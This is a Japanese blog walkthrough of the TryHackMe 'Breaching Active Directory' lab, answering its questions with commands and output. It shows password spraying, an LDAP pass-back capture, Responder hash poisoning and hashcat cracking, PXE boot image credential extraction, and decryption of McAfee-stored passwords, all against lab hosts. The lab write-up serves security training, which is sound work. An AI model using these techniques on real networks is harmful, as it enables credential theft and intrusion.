LoginSignup
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

@kk0128

【TryHackMe】Breaching Active Directory:Walkthrough

Posted at

概要

TryHackMe「Breaching Active Directory」のWalkthroughです。

Task2

Q1.What popular website can be used to verify if your email address or password has ever been exposed in a publicly disclosed data breach?

A.HaveIBeenPwned

Task3

Q1.What is the name of the challenge-response authentication mechanism that uses NTLM?

A.NetNtlm

Q2.What is the username of the third valid credential pair found by the password spraying script?

Hint.If you are not using the AttackBox, make sure to install the Python libraries required to run the script, including both requests and requests_ntlm libraries.

提供されているpythonプログラムでパスワードスプレー攻撃を実行し、ユーザー名を発見します。

$ python ntlm_passwordspray.py -u usernames.txt -f za.tryhackme.com -p Changeme123 -a http://ntlmauth.za.tryhackme.com
[*] Starting passwords spray attack using the following password: Changeme123
[-] Failed login with Username: anthony.reynolds
[-] Failed login with Username: samantha.thompson
[-] Failed login with Username: dawn.turner
[-] Failed login with Username: frances.chapman
[-] Failed login with Username: henry.taylor
[-] Failed login with Username: jennifer.wood
[+] Valid credential pair found! Username: hollie.powell Password: Changeme123
[-] Failed login with Username: louise.talbot
[+] Valid credential pair found! Username: heather.smith Password: Changeme123
[-] Failed login with Username: dominic.elliott
[+] Valid credential pair found! Username: gordon.stevens Password: Changeme123
[-] Failed login with Username: alan.jones
[-] Failed login with Username: frank.fletcher
[-] Failed login with Username: maria.sheppard
[-] Failed login with Username: sophie.blackburn
[-] Failed login with Username: dawn.hughes
[-] Failed login with Username: henry.black
[-] Failed login with Username: joanne.davies
[-] Failed login with Username: mark.oconnor
[+] Valid credential pair found! Username: georgina.edwards Password: Changeme123
[*] Password spray attack completed, 4 valid credential pairs found

A.gordon.stevens

Q3.How many valid credentials pairs were found by the password spraying script?

A.4

Q4.What is the message displayed by the web application when authenticating with a valid credential pair?

Hint.Either modify the password spraying script to print out the "response.text" when the credentials are valid or use a Chrome browser window to authenticate manually using one of the valid credential pairs.

発見した認証情報でWebアプリケーションにログイン出来ました。

image.png

A.Hello World

Task4

Q1.What type of attack can be performed against LDAP Authentication systems not commonly found against Windows Authentication systems?

Hint.This is a common attack to run against printers, forcing the printers to return AD credentials.

A.LDAP Pass-back Attack

Q2.What two authentication mechanisms do we allow on our rogue LDAP server to downgrade the authentication and make it clear text?

Hint.Use ldapsearch to list the supported authentication mechanisms on the rogue LDAP server. Answer format is , in alphabetical order.

構築したRogue LDAP Serverに対してldapsearchを実行し確認します。

$ ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms
dn:
supportedSASLMechanisms: LOGIN
supportedSASLMechanisms: PLAIN

A.LOGIN,PLAIN

Q3.What is the password associated with the svcLDAP account?

image.png

何回かTest Settingsを実行

$ sudo tcpdump -SX -i breachad tcp port 389

(省略)

09:56:10.776020 IP 10.200.4.201.49917 > 10.50.2.30.ldap: Flags [P.], seq 2298699562:2298699627, ack 4084903087, win 1025, length 65
        0x0000:  4500 0069 996e 4000 7f06 4640 0ac8 04c9  E..i.n@...F@....
        0x0010:  0a32 021e c2fd 0185 8903 5f2a f37a acaf  .2........_*.z..
        0x0020:  5018 0401 6232 0000 3084 0000 003b 0201  P...b2..0....;..
        0x0030:  1660 8400 0000 3202 0102 0418 7a61 2e74  .`....2.....za.t
        0x0040:  7279 6861 636b 6d65 2e63 6f6d 5c73 7663  ryhackme.com\svc
        0x0050:  4c44 4150 8013 7472 7968 6163 6b6d 656c  LDAP..tryhackmel
        0x0060:  6461 7070 6173 7331 40                   dappass1@

A.tryhackmeldappass1@

Task5

Q1.What is the name of the tool we can use to poison and capture authentication requests on the network?

A.Responder

Q2.What is the username associated with the challenge that was captured?

Responderを実行します。

$ sudo responder -I breachad

しばらく待っているとハッシュ値を得られました。

[SMB] NTLMv2-SSP Client   : 10.200.4.202
[SMB] NTLMv2-SSP Username : ZA\svcFileCopy
[SMB] NTLMv2-SSP Hash     : svcFileCopy::ZA:0a5448743b8d89d6:250B69CDCC8906515DCF924EDCB59BE3:010100000000000080CC8A6EEC72DB01A6B73243635180F100000000020008004E00450038004A0001001E00570049004E002D00370047005400320041003500580052004B003200380004003400570049004E002D00370047005400320041003500580052004B00320038002E004E00450038004A002E004C004F00430041004C00030014004E00450038004A002E004C004F00430041004C00050014004E00450038004A002E004C004F00430041004C000700080080CC8A6EEC72DB01060004000200000008003000300000000000000000000000002000007A5A4FE12A9AE5E0A0810506568751D8DFE3F796E295ACE976695A95C613950F0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00350030002E0032002E00330030000000000000000000

A.svcFileCopy

Q3.What is the value of the cracked password associated with the challenge that was captured?

Hashcatでハッシュ値を解析し、パスワードを得られました。

$ hashcat -m 5600 ntlmhash passwordlist-1647876320267.txt

SVCFILECOPY::ZA:0a5448743b8d89d6:250b69cdcc8906515dcf924edcb59be3:010100000000000080cc8a6eec72db01a6b73243635180f100000000020008004e00450038004a0001001e00570049004e002d00370047005400320041003500580052004b003200380004003400570049004e002d00370047005400320041003500580052004b00320038002e004e00450038004a002e004c004f00430041004c00030014004e00450038004a002e004c004f00430041004c00050014004e00450038004a002e004c004f00430041004c000700080080cc8a6eec72db01060004000200000008003000300000000000000000000000002000007a5a4fe12a9ae5e0a0810506568751d8dfe3f796e295ace976695a95c613950f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00350030002e0032002e00330030000000000000000000:FPassword1!

A.FPassword1!

Task6

Q1.What Microsoft tool is used to create and host PXE Boot images in organisations?

A.Microsoft Deployment Toolkit

Q2.What network protocol is used for recovery of files from the MDT server?

A.TFTP

Q3.What is the username associated with the account that was stored in the PXE Boot image?

http://pxeboot.za.tryhackme.com/へアクセスし、x64{}を確認します。

image.png

ターゲットマシンにSSH接続します。

$ ssh thm@THMJMP1.za.tryhackme.com

任意のフォルダを作成し、powerpxeをコピーします。

thm@THMJMP1 C:\Users\thm>cd Documents
thm@THMJMP1 C:\Users\thm\Documents>mkdir hello
thm@THMJMP1 C:\Users\thm\Documents>copy C:\powerpxe hello\
C:\powerpxe\LICENSE
C:\powerpxe\PowerPXE.ps1
C:\powerpxe\README.md
        3 file(s) copied.
thm@THMJMP1 C:\Users\thm\Documents>cd hello

先ほど確認したx64{}をダウンロードします。

thm@THMJMP1 C:\Users\thm\Documents\hello>tftp -i 10.200.4.202 GET "\Tmp\x64{E792F07E-C0FB-4D15-816C-1D04070AD19D}.bcd" conf.bcd

powershellを起動します。

thm@THMJMP1 C:\Users\thm\Documents\hello>powershell -executionpolicy bypass

コピーしたpowerpxeをインポートします。

PS C:\Users\thm\Documents\hello> Import-Module .\PowerPXE.ps1

$BCDFile変数を設定し、Get-WimFile -bcdFileコマンドでプログラムを実行します。

PS C:\Users\thm\Documents\hello> $BCDFile = "conf.bcd"
PS C:\Users\thm\Documents\hello> Get-WimFile -bcdFile $BCDFile
>> Parse the BCD file: conf.bcd
>>>> Identify wim file : \Boot\x64\Images\LiteTouchPE_x64.wim
\Boot\x64\Images\LiteTouchPE_x64.wim

BCDファイルから出力されたwimファイルをダウンロードします。

PS C:\Users\thm\Documents\hello> tftp -i 10.200.4.202 GET "\Boot\x64\Images\LiteTouchPE_x64.wim" pxeboot.w
im
Transfer successful: 341899611 bytes in 325 second(s), 1051998 bytes/s

wimファイルにある資格情報をダウンプします。

PS C:\Users\thm\Documents\hello> Get-FindCredentials -WimFile pxeboot.wim
>> Open pxeboot.wim
>>>> Finding Bootstrap.ini
>>>> >>>> DeployRoot = \\THMMDT\MTDBuildLab$
>>>> >>>> UserID = svcMDT
>>>> >>>> UserDomain = ZA
>>>> >>>> UserPassword = PXEBootSecure1@

A.svcMDT

Q4.What is the password associated with the account that was stored in the PXE Boot image?

A.PXEBootSecure1@

Task7

Q1.What type of files often contain stored credentials on hosts?

A.Configuration Files

Q2.What is the name of the McAfee database that stores configuration including credentials used to connect to the orchestrator?

ma.dbをダウンロードします。

$ scp thm@THMJMP1.za.tryhackme.com:C:/ProgramData/McAfee/Agent/DB/ma.db .
thm@thmjmp1.za.tryhackme.com's password: 
ma.db                                                                   100%  118KB  59.0KB/s   00:02

A.ma.db

Q3.What table in this database stores the credentials of the orchestrator?

sqlitebrowserma.dbを開き、AGENT_REPOSITORIESテーブルを確認します。

image.png

A.AGENT_REPOSITORIES

Q4.What is the username of the AD account associated with the McAfee service?

AGENT_REPOSITORIESテーブルからアカウントを発見しました。

image.png

A.svcAV

Q5.What is the password of the AD account associated with the McAfee service?

パスワード復号ツールをダウンロードします。

AUTH_PASSWDカラムからパスワードを入手できたので、ツールを使って復号します。

$ python mcafee_sitelist_pwd_decrypt.py jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
Crypted password   : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
Decrypted password : MyStrongPassword!

A.MyStrongPassword!

100万記事ありがとう!2025年もたくさんアウトプットしよう
0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
Sign upLogin
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?